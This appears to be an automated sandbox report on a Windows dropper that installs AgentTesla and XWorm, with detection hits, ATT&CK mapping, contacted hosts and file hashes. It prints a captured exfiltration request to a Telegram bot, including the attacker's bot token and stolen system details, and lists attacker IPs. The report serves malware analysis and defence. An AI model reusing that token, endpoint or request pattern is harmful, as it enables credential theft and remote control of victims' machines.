Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	231 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	25 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	331 Security Software Discovery	Distributed Component Object Model	1 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	1 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	241 Virtualization/Sandbox Evasion	Cached Domain Credentials	241 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	123 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
DJ5PhUwOsM.exe	92%	ReversingLabs	Win32.Backdoor.Fynloski
DJ5PhUwOsM.exe	100%	Avira	TR/Spy.Gen8
DJ5PhUwOsM.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	100%	Avira	TR/Spy.Gen8
C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe	82%	ReversingLabs	ByteCode-MSIL.Spyware.AsyncRAT

Source	Detection	Scanner	Label	Link
89.40.31.232	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
89.40.31.232	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB01AAE6F744B3247914%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20LYRNOABZ9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.ipify.org	DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.dr	false	high
https://account.dyn.com/	DJ5PhUwOsM.exe, FB_7BD8.tmp.exe.0.dr	false	high
https://api.ipify.org/t	FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	DJ5PhUwOsM.exe, FB_7D21.tmp.exe.0.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	FB_7BD8.tmp.exe, 00000002.00000002.4524594091.0000000002861000.00000004.00000800.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4524379102.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false	high
http://microsoft.co	FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1DB000.00000004.00000020.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
89.40.31.232	unknown	Romania	35512	TELEMEDIA-ASRO	true
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
162.254.34.31	unknown	United States	64200	VIVIDHOSTINGUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562433
Start date and time:	2024-11-25 15:35:24 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DJ5PhUwOsM.exe renamed because original name is a hash value
Original Sample Name:	65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/2@2/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 56 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: DJ5PhUwOsM.exe

Simulations

Behavior and APIs

Time	Type	Description
09:36:20	API Interceptor	40x Sleep call for process: FB_7BD8.tmp.exe modified
09:36:35	API Interceptor	12988843x Sleep call for process: FB_7D21.tmp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
89.40.31.232	Dekont#400577_89008_96634.exe	Get hash	malicious	Azorult, GuLoader	Browse	89.40.31.232/12/index.php
89.40.31.232	No. 1349240400713.exe	Get hash	malicious	Azorult, GuLoader	Browse	89.40.31.232/12/index.php
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	104.26.13.205
	PO#86637.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	104.26.13.205
	CHARIKLIA JUNIOR DETAILS (1) (1).pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	New Purchase Order Document for PO1136908 000 SE.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	DATASHEET.pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	https://linktr.ee/priyanka662	Get hash	malicious	Gabagool	Browse	172.67.74.152
	mDHwap5GlV.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.74.152
	zapret.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	313e4225be01a2f968dd52e4e8c0b9fd08c906289779b.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	unturnedHack.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
api.telegram.org	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse	149.154.167.220
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse	149.154.167.220
	MSM8C42iAN.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	November Quotation.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	wMy37vlfvz.exe	Get hash	malicious	DarkCloud	Browse	149.154.167.220
	dekont 25.11.2024 PDF.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	denizbank 25.11.2024 E80 aspc.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://docs.zoom.us/doc/5mbYcD6lRBK5O3HcDEXhFA?from=email	Get hash	malicious	Unknown	Browse	172.67.201.42
	Payment-251124.exe	Get hash	malicious	FormBook	Browse	104.21.24.198
	3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://click.pstmrk.it/3s/greatestannualeventsinamerica.com/19Hg/24i5AQ/AQ/00bfb018-90f5-4b99-8834-436dd88a4b16/1/pcsx-lhnFb	Get hash	malicious	Unknown	Browse	104.21.1.135
	AnuhIsNqBl.exe	Get hash	malicious	LummaC	Browse	172.67.160.80
	3e5cb809-f546-fb3c-b0e3-5de228b453ab.eml	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	oGjfUw6bZu.exe	Get hash	malicious	LummaC	Browse	104.21.53.40
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	104.21.111.0
	file.exe	Get hash	malicious	NetSupport RAT	Browse	104.26.0.231
	sjth8TLl4P.exe	Get hash	malicious	LummaC	Browse	172.67.160.80
VIVIDHOSTINGUS	Ref#2056119.exe	Get hash	malicious	AgentTesla, XWorm	Browse	162.254.34.31
	sh4.elf	Get hash	malicious	Mirai	Browse	192.26.155.193
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
	Ref#150062.vbe	Get hash	malicious	MassLogger RAT	Browse	162.254.34.31
	BankInformation.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	SWIFTCOPY202973783.vbe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	162.254.34.31
	m68k.elf	Get hash	malicious	Unknown	Browse	64.190.116.37
	Urgent Quotation documents One Pdf.vbs	Get hash	malicious	AgentTesla	Browse	162.254.34.31
TELEMEDIA-ASRO	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse	89.40.31.232
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse	89.40.31.232
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse	89.40.31.232
	Dekont#400577_89008_96634.exe	Get hash	malicious	Azorult, GuLoader	Browse	89.40.31.232
	No. 1349240400713.exe	Get hash	malicious	Azorult, GuLoader	Browse	89.40.31.232

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	2ehwX6LWt3.exe	Get hash	malicious	XWorm	Browse	149.154.167.220 104.26.13.205
	Mzo6BdEtGv.exe	Get hash	malicious	XWorm	Browse	149.154.167.220 104.26.13.205
	tE3ZXBTP0B.exe	Get hash	malicious	XWorm	Browse	149.154.167.220 104.26.13.205
	http://begantotireo.xyz	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	Pe4905VGl1.bat	Get hash	malicious	AsyncRAT	Browse	149.154.167.220 104.26.13.205
	https://go.dgdp.net/	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	http://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	LAQfpnQvPQ.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220 104.26.13.205
	idk_1.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205
	FreeCs2Skins.ps1	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.13.205

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe	Booking_261.exe	Get hash	malicious	AgentTesla, Clipboard Hijacker	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe

Download File

Process:	C:\Users\user\Desktop\DJ5PhUwOsM.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	240128
Entropy (8bit):	4.998082516808912
Encrypted:	false
SSDEEP:	3072:Z+2Lmlx1JlKiSBTxbBGiz64tlyz5X0JdYA4:Z+2Lmlx1JldSVxbBF643yOdx
MD5:	A21DF2C0CCA131EB534F520FD641ADB5
SHA1:	CD39E12E326191888B836C3419AC2CB71C2B5B11
SHA-256:	FB247F5397BA1B2D9328D1ACC2FD322181A91CED1953853ABB41718DC21198AE
SHA-512:	DEE53E8D4EEF995340308A7EF184217556DE7C0BA1F1B3FFE0937FE6EA0FBCFD5C3B09BDF8A937A6849B9A2401CB89A8A1C720668A6041E0738FCFA7DFE6AF02
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 88%
Joe Sandbox View:	Filename: Booking_261.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ef................................. ........@.. ....................................@.................................p...K.......F............................................................................ ............... ..H............text....... ...................... ..`.rsrc...F...........................@..@.reloc..............................@..B........................H...........0...............................................................H>H}>.b..&.g......y.O.A..{...KF......'u..I...0.......u...y....8`.q.hSw/.a....\.=!t@K..n.z...~2.n.$.)...&#...L.t^X..t.com.apple.Safari...............ixKZ-...4.xV....4.xV....~...d...r...a...G...o...n...~...~...F...@...7...%...m...$...~....}.....is.......5..0.m..._.7...6q.~[b8...d.K.Z.S..h.wCLG.....kL..Rk.#NX..........=.K...!.........=.K...!.&..9..q...Sz.\|........................................

C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe

Download File

Process:	C:\Users\user\Desktop\DJ5PhUwOsM.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	6.066050319145751
Encrypted:	false
SSDEEP:	1536:mj2knMmhKdS08aK+rgYkdQOV9bFejQ4HyLPnqo9OMwPvyia:mQTnDrGdQo9bFxYo9OtVa
MD5:	068C99328320CAAA7C5F2D31B0FF214B
SHA1:	E18B1E08E7F256602BE60E1D75B15C2C73284CA2
SHA-256:	E9434C0BF7BE5E39CFAD4FE44BB996B09C1283DE5706A8721A33363080E9D016
SHA-512:	A86C80A454C912F379C8077A1FCFFC5B79681E4DE7020FDA900E55A59566DFC5E11086695448CDD33659ED6E6E000A4A46009BE29FFA5A9EB3730014DE48AA18
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Pk.g................."...........A... ...`....@.. ....................................@.................................lA..O....`............................................................................... ............... ..H............text....!... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................A......H........_..........&.....................................................(.....r...p. ..L...(.....r5..p. =....s.........s.........s.........s..........ri..p. ..r..r...p. ..M..r...p. .....r...p. ....r9..p. .J....((....r...p. ._...r...p. ..."(....+."(....+.&(....&+..+5sA... .... .'..oB...(,...~....-.(J...(<...~....oC...&.-..rw..p. p{..r...p. ..e..r...p. .y..r...p. 9....rG..p. .&..r{..p. .(T..r...p. ..................j...............

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.231286300665583
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.98% Win32 Executable (generic) a (10002005/4) 49.93% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	DJ5PhUwOsM.exe
File size:	335'872 bytes
MD5:	d61526463472da19dd8869f484a8f4ef
SHA1:	20514ac586fb6847057be18ecf00b84cda7e948f
SHA256:	65ea7c521264d69a5e044a2fa7aa5a330385e733b1cefbff31cb805abaf067fa
SHA512:	925089713ea4877de9300c0998eabcef4850af08ea6e7a12704e92736928461e54a8fa8cb56c3c910ca334e5395a5497f38715237970f4f70532a26405cd3fee
SSDEEP:	3072:7+2Lmlx1JlKiSBTxbBGiz64tlyz5X0JdYA4TQTnDrGdQo9bFxYo9OtVa2M:7+2Lmlx1JldSVxbBF643yOdxBDrGVbHR
TLSH:	7C6472027F88EB11E1A93E3782EF2D2413B2B0C71633D20F6F499B6514516869D7EB6D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.qhR.qhR.qhR..wX.zhR..t\.phR..wV.shR..g..thR.qhS.nhR..wY.shR..nT.phR.RichqhR.........................PE..L...)..P...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x401190
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x50CC1329 [Sat Dec 15 06:05:29 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	009023b6b22e202aa54365d2270f6f95

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00402080h
push 00401310h
